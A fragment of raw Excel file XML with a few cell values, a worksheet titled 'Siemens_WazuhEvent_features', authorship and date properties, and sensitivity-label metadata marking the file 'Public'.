      <c r="D6">
        <v>5</v>
      </c>
      <c r="F6">
        <v>5</v>
      </c>
      <c r="H6">
        <v>10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fc0de803-e079-4d4f-96bc-6f3b3b6923e3}" enabled="1" method="Privileged" siteId="{07ef1208-413c-4b5e-9cdd-64ef305754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Siemens_WazuhEvent_features</vt:lpstr>
      <vt:lpstr>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Carol Lo</cp:lastModifiedBy>
  <dcterms:created xsi:type="dcterms:W3CDTF">2026-01-06T15:56:42Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2026-01-15T16:22:31Z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0de803-e079-4d4f-96bc-6f3b3b6923e3_Enabled">
    <vt:lpwstr>true</vt:lpwstr>
  </property>
  <property fmtid="{D5CDD505-2E9C-101B-9397-08002B2CF9AE}" pid="3" name="MSIP_Label_fc0de803-e079-4d4f-96bc-6f3b3b6923e3_SetDate">
    <vt:lpwstr>2026-01-06T15:56:42Z</vt:lpwstr>
  </property>
  <property fmtid="{D5CDD505-2E9C-101B-9397-08002B2CF9AE}" pid="4" name="MSIP_Label_fc0de803-e079-4d4f-96bc-6f3b3b6923e3_Method">
    <vt:lpwstr>Standard</vt:lpwstr>
  </property>
  <property fmtid="{D5CDD505-2E9C-101B-9397-08002B2CF9AE}" pid="5" name="MSIP_Label_fc0de803-e079-4d4f-96bc-6f3b3b6923e3_Name">
    <vt:lpwstr>Public</vt:lpwstr>
  </property>
  <property fmtid="{D5CDD505-2E9C-101B-9397-08002B2CF9AE}" pid="6" name="MSIP_Label_fc0de803-e079-4d4f-96bc-6f3b3b6923e3_SiteId">
    <vt:lpwstr>07ef1208-413c-4b5e-9cdd-64ef305754f0</vt:lpwstr>
  </property>
  <property fmtid="{D5CDD505-2E9C-101B-9397-08002B2CF9AE}" pid="7" name="MSIP_Label_fc0de803-e079-4d4f-96bc-6f3b3b6923e3_ActionId">
    <vt:lpwstr>1cea131a-2eac-4a9b-95b1-e1721b5596f4</vt:lpwstr>
  </property>
  <property fmtid="{D5CDD505-2E9C-101B-9397-08002B2CF9AE}" pid="8" name="MSIP_Label_fc0de803-e079-4d4f-96bc-6f3b3b6923e3_ContentBits">
    <vt:lpwstr>0</vt:lpwstr>
  </property>
</Properties>
</file>